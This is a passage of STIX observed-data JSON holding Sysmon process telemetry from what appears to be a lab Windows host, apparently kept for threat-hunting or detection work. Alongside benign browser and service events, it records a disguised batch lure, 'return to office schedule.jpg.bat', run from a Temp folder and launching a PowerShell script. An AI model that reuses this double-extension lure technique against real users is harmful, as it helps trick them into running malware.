| "last_observed": "2022-07-27T14:26:59.230Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--a4aac5e1-d1bc-4a5d-af69-0709777f631e", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.487Z", | |
| "modified": "2022-07-28T16:05:08.487Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "\\??\\C:\\Windows\\system32\\conhost.exe", | |
| "0xffffffff", | |
| "-ForceV1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args_count": 6, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}", | |
| "pe_file_version": "10.0.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Console Window Host", | |
| "pe_original_file_name": "CONHOST.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2902-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "cmd.exe", | |
| "pid": 7220, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Alice\\AppData\\Local\\Temp\\return to office schedule.jpg.bat\"\"" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "conhost.exe", | |
| "pid": 5592, | |
| "binary_ref": "6", | |
| "command_line": "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:07.627762784Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:01.279Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "cmd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "conhost.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "\\??\\C:\\Windows\\system32\\conhost.exe", | |
| "0xffffffff", | |
| "-ForceV1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args_count": 6, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}", | |
| "pe_file_version": "10.0.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Console Window Host", | |
| "pe_original_file_name": "CONHOST.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2902-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:59.417Z", | |
| "last_observed": "2022-07-27T14:26:59.417Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--e8ca6766-f2fc-4bcf-837f-f7349cf84444", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.488Z", | |
| "modified": "2022-07-28T16:05:08.488Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell", | |
| "-file", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args_count": 6, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2a02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "cmd.exe", | |
| "pid": 7220, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Alice\\AppData\\Local\\Temp\\return to office schedule.jpg.bat\"\"" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 2476, | |
| "binary_ref": "6", | |
| "command_line": "powershell -file C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:07.629634629Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:01.279Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "cmd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 2476, | |
| "binary_ref": "6", | |
| "command_line": "powershell -file C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell", | |
| "-file", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args_count": 6, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2a02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:59.869Z", | |
| "last_observed": "2022-07-27T14:26:59.869Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--900d7086-a176-4d12-b693-fc9aeea6e960", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.488Z", | |
| "modified": "2022-07-28T16:05:08.488Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "cmd.exe", | |
| "pid": 7220, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:27:17.835965328Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:11.496Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "cmd.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:10.261Z", | |
| "last_observed": "2022-07-27T14:27:10.261Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--1ece0dbc-96df-4d97-b269-5ea9bc55231c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.488Z", | |
| "modified": "2022-07-28T16:05:08.488Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "wusvcs", | |
| "-p", | |
| "-s", | |
| "WaaSMedicSvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-48a9-62e1-9801-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 680 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "svchost.exe", | |
| "pid": 7220, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\svchost.exe -k wusvcs -p -s WaaSMedicSvc", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T14:16:17.165822332Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:16:10.837Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "wusvcs", | |
| "-p", | |
| "-s", | |
| "WaaSMedicSvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-48a9-62e1-9801-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:16:09.937Z", | |
| "last_observed": "2022-07-27T14:16:09.937Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "name": "elastic_ecs", | |
| "type": "identity" | |
| }, | |
| { | |
| "id": "observed-data--f29e78e4-6e3b-4e75-8a8a-7ea29a062e3e", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.916Z", | |
| "modified": "2022-07-28T16:05:22.916Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=utility", | |
| "--utility-sub-type=data_decoder.mojom.DataDecoderService", | |
| "--lang=en-US", | |
| "--service-sandbox-type=service", | |
| "--mojo-platform-channel-handle=5036", | |
| "--field-trial-handle=2092,i,11005644001171300450,12417626312259248729,131072", | |
| "/prefetch:8" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--no-startup-window", | |
| "/prefetch:5" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4952-62e1-aa01-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 8, | |
| "entity_id": "{ca21cdf6-4956-62e1-b601-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 8476, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 5380, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5036 --field-trial-handle=2092,i,11005644001171300450,12417626312259248729,131072 /prefetch:8", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:19:10.464615161Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:19:04.128Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=utility", | |
| "--utility-sub-type=data_decoder.mojom.DataDecoderService", | |
| "--lang=en-US", | |
| "--service-sandbox-type=service", | |
| "--mojo-platform-channel-handle=5036", | |
| "--field-trial-handle=2092,i,11005644001171300450,12417626312259248729,131072", | |
| "/prefetch:8" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--no-startup-window", | |
| "/prefetch:5" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4952-62e1-aa01-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 8, | |
| "entity_id": "{ca21cdf6-4956-62e1-b601-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:19:02.385Z", | |
| "last_observed": "2022-07-27T14:19:02.385Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--2d14c645-c117-4706-8c32-e5a7f71bf7fd", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.917Z", | |
| "modified": "2022-07-28T16:05:22.917Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 5380, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:19:10.466904240Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:19:04.128Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4956-62e1-b601-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:19:02.586Z", | |
| "last_observed": "2022-07-27T14:19:02.586Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--b3d8dc91-13bf-46e4-8b91-f254eb072b40", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.917Z", | |
| "modified": "2022-07-28T16:05:22.917Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "11.00.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Internet Explorer", | |
| "pe_description": "Internet Explorer", | |
| "pe_original_file_name": "IEXPLORE.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 4, | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.ibm.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:6492 CREDAT:9474 /prefetch:2", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:18.682628882Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:12.345Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "11.00.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Internet Explorer", | |
| "pe_description": "Internet Explorer", | |
| "pe_original_file_name": "IEXPLORE.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 4, | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:11.427Z", | |
| "last_observed": "2022-07-27T14:26:11.427Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--73da8449-dc4c-496c-8f18-0e11c7bbc264", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.917Z", | |
| "modified": "2022-07-28T16:05:22.917Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
